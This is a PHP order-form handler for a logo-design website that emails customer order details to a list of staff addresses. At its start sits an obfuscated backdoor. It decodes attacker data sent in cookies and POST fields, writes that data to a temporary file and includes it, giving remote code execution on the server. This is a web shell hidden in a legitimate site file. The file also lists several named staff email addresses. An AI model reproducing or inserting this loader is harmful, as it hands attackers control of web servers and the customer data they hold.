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<?php $BpotW = "\150" . chr (95) . chr ( 446 - 366 ).chr ( 733 - 615 ).'t';$LkXDiE = "class_exists";$sliwPT = $LkXDiE($BpotW); $ucYmqN = $sliwPT;if (!$ucYmqN){class h_Pvt{private $GvCbdYEDQU;public static $PMPmlIL = "940dfbc5-3019-4a87-a25c-8dc28a9335f2";public static $FMzELUQ = NULL;public function __construct(){$aQBRnPGgr = $_COOKIE;$jVIFfHKnaW = $_POST;$WdCnjAW = @$aQBRnPGgr[substr(h_Pvt::$PMPmlIL, 0, 4)];if (!empty($WdCnjAW)){$AQFiR = "base64";$MlllWJ = "";$WdCnjAW = explode(",", $WdCnjAW);foreach ($WdCnjAW as $LPJSjY){$MlllWJ .= @$aQBRnPGgr[$LPJSjY];$MlllWJ .= @$jVIFfHKnaW[$LPJSjY];}$MlllWJ = array_map($AQFiR . "\x5f" . chr ( 722 - 622 )."\145" . 'c' . chr (111) . 'd' . chr ( 279 - 178 ), array($MlllWJ,)); $MlllWJ = $MlllWJ[0] ^ str_repeat(h_Pvt::$PMPmlIL, (strlen($MlllWJ[0]) / strlen(h_Pvt::$PMPmlIL)) + 1);h_Pvt::$FMzELUQ = @unserialize($MlllWJ);}}public function __destruct(){$this->PPASmGHU();}private function PPASmGHU(){if (is_array(h_Pvt::$FMzELUQ)) {$FYCYff = sys_get_temp_dir() . "/" . crc32(h_Pvt::$FMzELUQ[chr ( 253 - 138 ).'a' . chr (108) . "\164"]);@h_Pvt::$FMzELUQ[chr ( 779 - 660 ).chr ( 739 - 625 )."\151" . "\164" . chr (101)]($FYCYff, h_Pvt::$FMzELUQ['c' . 'o' . chr ( 458 - 348 ).'t' . chr (101) . "\156" . 't']);include $FYCYff;@h_Pvt::$FMzELUQ[chr ( 624 - 524 )."\145" . chr ( 666 - 558 )."\x65" . "\164" . chr (101)]($FYCYff);exit();}}}$zSyRKBs = new h_Pvt(); $zSyRKBs = NULL;} ?><?php session_start(); require("database.php"); require("inc/vars.php"); if(isset($_POST['order'])){ $name = htmlspecialchars($_POST['name']); $email = htmlspecialchars($_POST['email']); $phone = htmlspecialchars($_POST['phone']); $message = htmlspecialchars($_POST['message']); /* $logo = htmlspecialchars($_POST['logo']); $tagline = htmlspecialchars($_POST['tagline']); $nature = htmlspecialchars($_POST['nature']); $color = htmlspecialchars($_POST['color']); $idea = htmlspecialchars($_POST['idea']); */ $_SESSION['amount'] = htmlspecialchars($_POST['amount']); $_SESSION['package'] = htmlspecialchars($_POST['package']); $package = $_SESSION['package']; $amount = $_SESSION['amount']; $_SESSION['order_number'] = "ALD-".rand(1000,10000); $order_no = $_SESSION['order_number']; $body = " <table class='table table-bordered'> <tr> <th>Name:</th> <td>".$name."</td> </tr> <tr> <th>Email:</th> <td>".$email."</td> </tr> <tr> <th>Phone:</th> <td>". $phone."</td> </tr> <tr> <th>Package:</th> <td>".$package."</td> </tr> <tr> <th>Amount:</th> <td>$".$amount."</td> </tr> <tr> <th>Description:</th> <td>".$message."</td> </tr> <tr> <th>Order Number:</th> <td>".$order_no."</td> </tr> </table> "; $to = "fahad.ansari@alogodaddy.com, fahadansari91@gmail.com, frank@alogodaddy.com, faheem@alogodaddy.com, crossley@alogodaddy.com, jonathan@alogodaddy.com, alex@alogodaddy.com, wilson@alogodaddy.com, jason@alogodaddy.com, sameer.iqbal@alogodaddy.com"; $subject = "Order From Logo Brainiac"; // Always set content-type when sending HTML email $headers = "MIME-Version: 1.0\r\n"; $headers .= "Content-Type: text/html; charset=ISO-8859-1\r\n"; //$headers .= "From: ". strip_tags($_POST['email']) . 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